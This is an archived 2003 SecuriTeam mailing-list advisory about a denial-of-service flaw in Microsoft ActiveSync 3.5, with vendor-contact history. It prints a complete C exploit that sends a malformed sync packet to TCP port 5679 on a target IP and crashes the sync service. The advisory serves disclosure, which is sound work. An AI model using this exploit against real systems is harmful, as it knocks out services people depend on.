[NT] ActiveSync Denial of Service Vulnerability

From: support@securiteam.com
Date: 03/23/03

  • Next message: support@securiteam.com: "[NT] Heap Overflow in Windows Script Engine"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 23 Mar 2003 12:53:53 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      ActiveSync Denial of Service Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    Microsoft ActiveSync allows you to create a partnership between your
    mobile device and desktop computer using a cable, cradle, or infrared.
    After you create a partnership, you can synchronize your data using a
    modem or network (Ethernet) card if your device supports it. You can also
    use your existing computer to connect to other resources through
    ActiveSync.

    The service runs on TCP port 5679 and by connecting to this port and
    sending a corrupted "sync request" packet the service can be crashed thus
    causing Denial of Service.

    DETAILS

    Vulnerable systems:
     * ActiveSync version 3.5

    By "pretending" to be an iPAQ and connecting to TCP port 5679, then
    sending a corrupted "I would like to sync with you" packet, a NULL pointer
    is referenced in a call to the function WideCharToMultiByte() while it is
    trying to process an entry within the packet. This then causes an
    application error, killing the "wcescomm" process.

    The service must then be restarted manually to enable an iPAQ to re-sync.

    Sample code to demonstrate the vulnerability is shown below:

    Exploit:
    /* iPAQ_Crash.c - by Andy Davis*/
    /* Strictly for testing purposes only */
    /* Compile with Microsoft VC++ */

    #include <winsock.h>
    #include <windows.h>
    #include <stdio.h>

    #define ASYNC_PORT 5679

    int main(int argc, char **argv)
    {

        unsigned char sendBuf[] =

    /* Correct Header */

    //"\x00\x00\x00\x00" /* Correct start of packet - by removing these 4
    bytes the crash occurs */
    "\x6e\x00\x00\x00" /* Length of the rest of the packet */
    "\x24\x00\x00\x00"
    "\x03\x00\xa3\x2b"
    "\x11\x0a\x00\x00"
    "\x00\x00\x00\x00"
    "\xc3\x1d\xdd\x0c" /* 0xc31ddd0c Device Identifier */
    "\x00\x00\x00\x00"
    "\x24\x00\x00\x00" /* 0x24 pointer to "Pocket_PC" */
    "\x38\x00\x00\x00" /* 0x38 pointer to "PocketPC" */
    "\x4a\x00\x00\x00" /* 0x4a pointer to "Compaq iPAQ H3800" */

    /* "Pocket_PC PocketPC Compaq iPAQ H3800" (in unicode) */

    "\x50\x00\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00"
    "\x5f\x00\x50\x00\x43\x00\x00\x00\x50\x00\x6f\x00\x63\x00\x6b\x00"
    "\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00\x43\x00\x6f\x00\x6d\x00"
    "\x70\x00\x61\x00\x71\x00\x20\x00\x69\x00\x50\x00\x41\x00\x51\x00"
    "\x20\x00\x48\x00\x33\x00\x38\x00\x39\x00\x30\x00\x00\x00";

        struct sockaddr_in servAddr;
        int s;

      WSADATA WSAData;
        if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
        {
          printf("WSAStartup failed.\n");
          WSACleanup();
          exit(1);
        }

      if (argc != 2)
      {
        printf ("\niPAQ_Crash\n");
        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit (1);
      }

        servAddr.sin_family = AF_INET;
        servAddr.sin_addr.s_addr = inet_addr(argv[1]);
        servAddr.sin_port = htons(ASYNC_PORT);

        s = socket(AF_INET, SOCK_STREAM, 0);
        connect(s, (struct sockaddr *) &servAddr, sizeof(servAddr));

        printf("Sending packet...");

      if ( send(s, sendBuf, 118, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (0);
        }

        closesocket(s);
        return(0);
    }

    Vendor & Patch Information:
    The vendor of this product, Microsoft, was contacted via email using the
    address "security@microsoft.com" on 26 November 2002, Microsoft replied
    the following day to confirm receipt of the email. A second email was sent
    on 7 January 2003 to the same address to request information regarding the
    progress of any patch or workaround information. Microsoft did not reply
    to this email and no further correspondence has been received about the
    vulnerability.

    ADDITIONAL INFORMATION

    The original advisory can be found at:
     <http://www.irmplc.com/advisories/active_sync.txt>
    http://www.irmplc.com/advisories/active_sync.txt

    The information has been provided by <mailto:advisories@irmplc.com> IRM
    Advisories.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: support@securiteam.com: "[NT] Heap Overflow in Windows Script Engine"

    Relevant Pages